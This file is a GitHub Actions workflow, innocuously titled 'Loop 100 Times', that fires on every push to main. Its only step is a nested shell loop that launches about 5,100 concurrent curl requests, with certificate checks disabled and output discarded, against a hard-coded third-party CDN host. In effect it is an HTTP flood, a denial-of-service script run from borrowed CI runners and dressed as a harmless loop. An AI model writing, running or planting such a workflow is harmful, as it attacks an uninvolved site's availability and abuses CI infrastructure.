name: Loop 100 Times da46e816-4f0f-48c0-92a8-081b77f1d4f9

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times da46e816-4f0f-48c0-92a8-081b77f1d4f9
        id: loop_step
        run: |
          counter=0
          max_loops=50
          target="https://s4-n10-nl-cdn.eporner.com"
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks "$target" 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks "$target" 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




